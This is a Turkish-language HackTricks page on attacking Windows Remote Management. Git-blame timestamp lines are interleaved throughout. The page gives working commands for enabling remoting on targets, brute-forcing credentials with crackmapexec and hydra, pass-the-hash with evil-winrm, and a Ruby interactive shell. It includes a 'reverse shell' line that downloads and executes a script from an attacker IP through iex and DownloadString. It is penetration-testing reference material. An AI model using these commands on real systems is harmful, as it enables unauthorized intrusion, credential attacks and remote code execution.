2024-02-10 18:14:16 +00:00
# 5985,5986 - WinRM Pentesting
2022-04-28 16:01:33 +00:00
< details >
2024-05-05 22:43:52 +00:00
< summary > < strong > AWS hacklemeyi sı fı rdan kahramana öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Kı rmı zı Takı m Uzmanı )< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'ı desteklemenin diğer yolları :
2024-01-03 10:42:55 +00:00
2024-04-07 03:13:19 +00:00
* **Şirketinizi HackTricks'te reklamı nı görmek istiyorsanı z** veya **HackTricks'i PDF olarak indirmek istiyorsanı z** [**ABONELİK PLANLARI** ](https://github.com/sponsors/carlospolop )'na göz atı n!
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini** ](https://peass.creator-spring.com ) edinin
2024-05-05 22:43:52 +00:00
* [**PEASS Ailesi'ni** ](https://opensea.io/collection/the-peass-family ) keşfedin, özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonumuz
* **Bize katı lı n** 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) veya bizi **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )'da **takip edin** .
* **Hacking püf noktaları nı zı paylaşarak** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github depoları na PR göndererek katkı da bulunun.
2022-04-28 16:01:33 +00:00
< / details >
2024-05-05 22:43:52 +00:00
< figure > < img src = "../.gitbook/assets/image (380).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2024-02-10 18:14:16 +00:00
Deneyimli hackerlar ve ödül avcı ları ile iletişim kurmak için [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) sunucusuna katı lı n!
2023-02-27 09:28:45 +00:00
2024-04-07 03:13:19 +00:00
**Hackleme İçgörüleri**\
2024-05-05 22:43:52 +00:00
Hackleme heyecanı nı ve zorlukları nı ele alan içeriklerle etkileşime geçin
2023-02-27 09:28:45 +00:00
2024-02-10 18:14:16 +00:00
**Gerçek Zamanlı Hack Haberleri**\
2024-04-07 03:13:19 +00:00
Hı zlı tempolu hackleme dünyası nda gerçek zamanlı haberler ve içgörülerle güncel kalı n
2023-07-14 15:03:41 +00:00
2024-02-10 18:14:16 +00:00
**En Son Duyurular**\
2024-05-05 22:43:52 +00:00
Başlatı lan en yeni ödül avı programları ve önemli platform güncellemeleri hakkı nda bilgi sahibi olun
2023-07-14 15:03:41 +00:00
2024-04-07 03:13:19 +00:00
**Bize katı lı n** [**Discord** ](https://discord.com/invite/N3FrSbmwdy ) ve bugün en iyi hackerlarla işbirliğine başlayı n!
2022-10-27 23:22:18 +00:00
2022-07-28 09:46:19 +00:00
## WinRM
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
[Windows Uzak Yönetimi (WinRM) ](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\ ).aspx), HTTP(S) üzerinden Windows sistemlerinin uzaktan yönetimini sağlayan **Microsoft tarafı ndan geliştirilen bir protokol** olarak öne çı kı yor ve bu süreçte SOAP'ı kullanı yor. Temelde WMI tarafı ndan desteklenen WinRM, WMI işlemleri için HTTP tabanlı bir arayüz olarak kendini sunar.
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
Bir makinede WinRM'nin bulunması , SSH'nin diğer işletim sistemleri için nası l çalı ştı ğı na benzer şekilde PowerShell aracı lı ğı yla kolay uzaktan yönetimi sağlar. WinRM'nin etkin olup olmadı ğı nı belirlemek için belirli portları n açı lı p açı lmadı ğı nı n kontrol edilmesi önerilir:
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
* **5985/tcp (HTTP)**
* **5986/tcp (HTTPS)**
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
Yukarı daki listeden bir açı k port, WinRM'nin kurulduğunu ve dolayı sı yla uzaktan oturum başlatma girişimlerine izin verildiğini gösterir.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
### **WinRM Oturumu Başlatma**
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
PowerShell'i WinRM için yapı landı rmak için Microsoft'un `Enable-PSRemoting` komut dosyası devreye girer ve bilgisayarı n uzaktan PowerShell komutları nı kabul etmesini sağlar. Yükseltilmiş PowerShell erişimi ile, aşağı daki komutlar bu işlevselliği etkinleştirmek ve herhangi bir ana bilgisayarı güvenilir olarak belirlemek için çalı ştı rı labilir.
2024-02-08 21:36:35 +00:00
```powershell
2024-02-10 18:14:16 +00:00
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
2020-07-15 15:43:14 +00:00
```
2024-05-05 22:43:52 +00:00
Bu yaklaşı m, `trustedhosts` yapı landı rması na bir joker karakter eklemeyi içerir, bu adı m sonuçları nedeniyle dikkatli bir şekilde düşünülmesi gereken bir adı mdı r. Ayrı ca, saldı rganı n makinesinde ağ türünü "Genel"den "İş"e değiştirmenin gerekebileceği belirtilmektedir.
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
Ayrı ca, WinRM, aşağı daki gibi gösterildiği gibi `wmic` komutunu kullanarak **uzaktan etkinleştirilebilir** :
2024-02-08 21:36:35 +00:00
```powershell
2020-07-15 15:43:14 +00:00
wmic /node:< REMOTE_HOST > process call create "powershell enable-psremoting -force"
```
2024-04-07 03:13:19 +00:00
Bu yöntem, WinRM'nin uzaktan kurulumuna olanak tanı r, Windows makinelerini uzaktan yönetme esnekliğini artı rı r.
2024-02-08 21:36:35 +00:00
2024-04-07 03:13:19 +00:00
### Yapı landı rı ldı mı diye test edin
2024-02-08 21:36:35 +00:00
2024-05-05 22:43:52 +00:00
Saldı rı makinenizin yapı landı rması nı doğrulamak için `Test-WSMan` komutu kullanı lı r ve hedefin WinRM'nin doğru şekilde yapı landı rı lı p yapı landı rı lmadı ğı nı kontrol etmek için kullanı lı r. Bu komutu çalı ştı rarak, protokol sürümü ve wsmid ile ilgili ayrı ntı lar almayı beklemelisiniz, başarı lı yapı landı rmayı gösterir. Aşağı da, yapı landı rı lmı ş bir hedef için beklenen çı ktı yı gösteren örnekler ile yapı landı rı lmamı ş bir hedef için örnekler bulunmaktadı r:
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
* **Doğru şekilde** yapı landı rı lmı ş bir hedef için çı ktı şuna benzer olacaktı r:
2024-02-08 21:36:35 +00:00
```bash
Test-WSMan < target-ip >
```
2024-04-07 03:13:19 +00:00
### Bir komutu çalı ştı r
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
Uzaktaki bir makinede `ipconfig` komutunu çalı ştı rmak ve çı ktı sı nı görüntülemek için şunu yapı n:
2024-02-08 21:36:35 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
```
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 151 ) . png > )
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
Ayrı ca, mevcut PS konsolunuzda bir komutu **Invoke-Command** aracı lı ğı yla çalı ştı rabilirsiniz. Diyelim ki yerel olarak _enumeration_ adı nda bir fonksiyonunuz var ve bunu uzak bir bilgisayarda çalı ştı rmak istiyorsunuz, şunu yapabilirsiniz:
2024-02-08 21:36:35 +00:00
```powershell
2021-08-14 10:42:47 +00:00
Invoke-Command -ComputerName < computername > -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
2020-07-15 15:43:14 +00:00
```
2024-05-05 22:43:52 +00:00
### Bir Komut Dosyası Çalı ştı rma
2024-02-08 21:36:35 +00:00
```powershell
2024-02-10 18:14:16 +00:00
Invoke-Command -ComputerName < computername > -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
2021-01-03 00:43:09 +00:00
```
2024-05-05 22:43:52 +00:00
### Ters kabuk almak
2024-02-10 18:14:16 +00:00
```powershell
Invoke-Command -ComputerName < computername > -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
```
### Bir PS oturumu alı n
Etkileşimli bir PowerShell kabuğu almak için `Enter-PSSession` komutunu kullanı n:
2022-09-26 12:02:10 +00:00
```powershell
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
# Enter
2020-07-15 15:43:14 +00:00
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
2022-10-30 16:20:17 +00:00
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
2024-02-10 18:14:16 +00:00
# Save session in var
2022-10-30 16:20:17 +00:00
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)
2020-07-15 15:43:14 +00:00
```
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 1009 ) . png > )
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
**Oturum, "kurban" içinde yeni bir işlemde (wsmprovhost) çalı şacaktı r.**
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
### **WinRM'yi Açmaya Zorlama**
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
PS Remoting ve WinRM kullanmak için bilgisayar yapı landı rı lmamı şsa, şunları kullanarak etkinleştirebilirsiniz:
2024-02-08 21:36:35 +00:00
```powershell
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
### Oturumları Kaydetme ve Geri Yükleme
2020-07-15 15:43:14 +00:00
2024-04-07 03:13:19 +00:00
Bu, uzak bilgisayarda dil kı sı tlandı ğı nda **çalı şmayacaktı r** .
2024-02-08 21:36:35 +00:00
```powershell
2022-09-26 12:02:10 +00:00
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
2020-07-15 15:43:14 +00:00
#You can save a session inside a variable
2022-09-25 22:00:52 +00:00
$sess1 = New-PSSession -ComputerName < computername > [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
2020-07-15 15:43:14 +00:00
#And restore it at any moment doing
Enter-PSSession -Session $sess1
```
2024-04-07 03:13:19 +00:00
Bu oturumlar içinde _Invoke-Command_ kullanarak PS betiklerini yükleyebilirsiniz.
2024-02-08 21:36:35 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
```
2024-02-10 18:14:16 +00:00
### Hatalar
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
Eğer aşağı daki hatayı bulursanı z:
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
`enter-pssession : Uzak sunucuya 10.10.10.175 bağlanma işlemi aşağı daki hata ile başarı sı z oldu: WinRM istemcisi isteği işleyemez. Eğer kimlik doğrulama şeması Kerberos'tan farklı ysa veya istemci bilgisayarı bir etki alanı na katı lmamı şsa, o zaman HTTPS iletişim taşı ması kullanı lmalı veya hedef makine GüvenilirAnaBilgisayarlar yapı landı rma ayarı na eklenmelidir. GüvenilirAnaBilgisayarlar yapı landı rması için winrm.cmd kullanı n. GüvenilirAnaBilgisayarlar listesindeki bilgisayarları n kimlik doğrulaması yapı lmamı ş olabileceğini unutmayı n. Bu konu hakkı nda daha fazla bilgi almak için aşağı daki komutu çalı ştı rarak winrm yardı m yapı landı r komutunu kullanı n: winrm help config. Daha fazla bilgi için about_Remote_Troubleshooting Yardı m konusuna bakı n.`
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
Müşteri tarafı nda deneyin (bilgi [buradan ](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server )):
2020-07-15 15:43:14 +00:00
```ruby
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
2024-05-05 22:43:52 +00:00
< figure > < img src = "../.gitbook/assets/image (380).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2024-05-05 22:43:52 +00:00
[**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) sunucusuna katı lı n, deneyimli hackerlar ve hata ödül avcı ları ile iletişim kurun!
2023-02-27 09:28:45 +00:00
2024-04-07 03:13:19 +00:00
**Hacking Insights**\
2024-05-05 22:43:52 +00:00
Hacking'in heyecanı nı ve zorlukları nı ele alan içeriklerle etkileşime geçin
2022-10-27 23:22:18 +00:00
2024-05-05 22:43:52 +00:00
**Real-Time Hack News**\
Hı zla değişen hacking dünyası nda gerçek zamanlı haberler ve içgörülerle güncel kalı n
2023-02-27 09:28:45 +00:00
2024-05-05 22:43:52 +00:00
**Latest Announcements**\
Yayı nlanan en yeni hata ödüllerini ve önemli platform güncellemelerini takip edin
2023-07-14 15:03:41 +00:00
2024-05-05 22:43:52 +00:00
**Bize katı lı n** [**Discord** ](https://discord.com/invite/N3FrSbmwdy ) ve bugün en iyi hackerlarla işbirliğine başlayı n!
2022-10-27 23:22:18 +00:00
2024-02-10 18:14:16 +00:00
## Linux'ta WinRM bağlantı sı
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
### Brute Force
2020-09-20 21:44:41 +00:00
2024-05-05 22:43:52 +00:00
Dikkatli olun, winrm brute-force saldı rı ları kullanı cı ları engelleyebilir.
2020-09-20 21:41:33 +00:00
```ruby
#Brute force
crackmapexec winrm < IP > -d < Domain Name > -u usernames.txt -p passwords.txt
#Just check a pair of credentials
2022-05-01 12:49:36 +00:00
# Username + Password + CMD command execution
2020-09-20 21:44:41 +00:00
crackmapexec winrm < IP > -d < Domain Name > -u < username > -p < password > -x "whoami"
2022-05-01 12:49:36 +00:00
# Username + Hash + PS command execution
2020-09-20 21:44:41 +00:00
crackmapexec winrm < IP > -d < Domain Name > -u < username > -H < HASH > -X '$PSVersionTable'
2020-09-20 21:41:33 +00:00
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
```
2024-05-05 22:43:52 +00:00
### Kötücül-winrm Kullanı mı
2020-07-15 15:43:14 +00:00
```ruby
2024-02-10 18:14:16 +00:00
gem install evil-winrm
```
2024-05-05 22:43:52 +00:00
Oku **belgelendirme** onun github: [https://github.com/Hackplayers/evil-winrm ](https://github.com/Hackplayers/evil-winrm )
2024-02-10 18:14:16 +00:00
```ruby
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i < IP > /< Domain >
2020-07-15 15:43:14 +00:00
```
2024-05-05 22:43:52 +00:00
Evil-winrm'ı kullanarak bir **IPv6 adresine** bağlanmak için, bir **alan adı nı ** IPv6 adresine ayarlayarak _**/etc/hosts**_ içinde bir giriş oluşturun ve o alan adı na bağlanı n.
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
### Evil-winrm ile hash geçirme
2024-02-10 18:14:16 +00:00
```ruby
evil-winrm -u < username > -H < Hash > -i < IP >
```
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 680 ) . png > )
2024-02-10 18:14:16 +00:00
### Bir PS-docker makinesi kullanma
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
```
2024-04-07 03:13:19 +00:00
### Bir ruby betiği kullanma
2020-07-15 15:43:14 +00:00
2024-05-05 22:43:52 +00:00
**Kod buradan alı nmı ştı r:** [**https://alamot.github.io/winrm\_shell/** ](https://alamot.github.io/winrm\_shell/ )
2020-07-15 15:43:14 +00:00
```ruby
require 'winrm-fs'
# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
2024-02-05 02:28:59 +00:00
# https://alamot.github.io/winrm_shell/
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
conn = WinRM::Connection.new(
endpoint: 'https://IP:PORT/wsman',
transport: :ssl,
user: 'username',
password: 'password',
:no_ssl_peer_verification => true
2020-07-15 15:43:14 +00:00
)
class String
2024-02-10 18:14:16 +00:00
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
2020-07-15 15:43:14 +00:00
end
command=""
file_manager = WinRM::FS::FileManager.new(conn)
conn.shell(:powershell) do |shell|
2024-02-10 18:14:16 +00:00
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK` n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
2020-07-15 15:43:14 +00:00
end
```
2022-07-28 09:46:19 +00:00
## Shodan
2020-10-05 21:51:08 +00:00
* `port:5985 Microsoft-HTTPAPI`
2024-02-10 18:14:16 +00:00
## Referanslar
2022-10-27 23:22:18 +00:00
* [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/ ](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/ )
2024-02-10 18:14:16 +00:00
## HackTricks Otomatik Komutları
2021-10-18 11:21:18 +00:00
```
2021-08-12 12:53:13 +00:00
Protocol_Name: WinRM #Protocol Abbreviation if there is one.
Port_Number: 5985 #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment #Protocol Abbreviation Spelled out
2021-08-15 17:09:57 +00:00
Entry_1:
2024-02-10 18:14:16 +00:00
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.
2021-08-15 17:09:57 +00:00
2024-02-10 18:14:16 +00:00
sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘ MySuperSecr3tPass123!’
2021-08-15 17:09:57 +00:00
2024-02-10 18:14:16 +00:00
https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/
2021-08-15 17:09:57 +00:00
2024-02-10 18:14:16 +00:00
ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binary's from that directory or -s to upload scripts (sherlock)
menu
invoke-binary `tab`
2021-08-15 17:09:57 +00:00
2024-02-10 18:14:16 +00:00
#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))
2021-08-15 17:09:57 +00:00
2024-02-10 18:14:16 +00:00
https://book.hacktricks.xyz/pentesting/pentesting-winrm
2021-09-25 16:33:43 +00:00
2021-09-13 15:49:25 +00:00
Entry_2:
2024-02-10 18:14:16 +00:00
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
2021-08-15 22:19:51 +00:00
```
2024-04-07 03:13:19 +00:00
2023-07-14 15:03:41 +00:00
2024-05-05 22:43:52 +00:00
< figure > < img src = "../.gitbook/assets/image (380).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2024-04-07 03:13:19 +00:00
[**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) sunucusuna katı lı n ve deneyimli hackerlar ve ödül avcı ları ile iletişim kurun!
**Hacking Insights**\
Hacking'in heyecanı nı ve zorlukları nı ele alan içeriklerle etkileşime geçin
2022-10-27 23:22:18 +00:00
2024-02-10 18:14:16 +00:00
**Gerçek Zamanlı Hack Haberleri**\
2024-05-05 22:43:52 +00:00
Hı zlı tempolu hacking dünyası nı gerçek zamanlı haberler ve içgörülerle takip edin
2023-02-27 09:28:45 +00:00
2024-02-10 18:14:16 +00:00
**En Son Duyurular**\
2024-04-07 03:13:19 +00:00
Yeni ödül avı başlatmaları ve önemli platform güncellemeleri hakkı nda bilgi edinin
2023-02-27 09:28:45 +00:00
2024-05-05 22:43:52 +00:00
**Bize Katı lı n** [**Discord** ](https://discord.com/invite/N3FrSbmwdy ) ve bugün en iyi hackerlarla işbirliğine başlayı n!
2022-10-27 23:22:18 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-05-05 22:43:52 +00:00
< summary > < strong > Sı fı rdan kahraman olmaya kadar AWS hackleme öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'i desteklemenin diğer yolları :
2024-01-03 10:42:55 +00:00
2024-05-05 22:43:52 +00:00
* **Şirketinizi HackTricks'te reklamı nı zı görmek istiyorsanı z** veya **HackTricks'i PDF olarak indirmek istiyorsanı z** [**ABONELİK PLANLARI** ](https://github.com/sponsors/carlospolop )'na göz atı n!
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini** ](https://peass.creator-spring.com ) edinin
2024-05-05 22:43:52 +00:00
* [**The PEASS Family'yi** ](https://opensea.io/collection/the-peass-family ) keşfedin, özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonumuz
2024-04-07 03:13:19 +00:00
* **💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) katı lı n veya bizi **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**'da takip edin.**
* **Hacking püf noktaları nı zı paylaşarak PR'lar göndererek** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github depoları na katkı da bulunun.
2022-04-28 16:01:33 +00:00
< / details >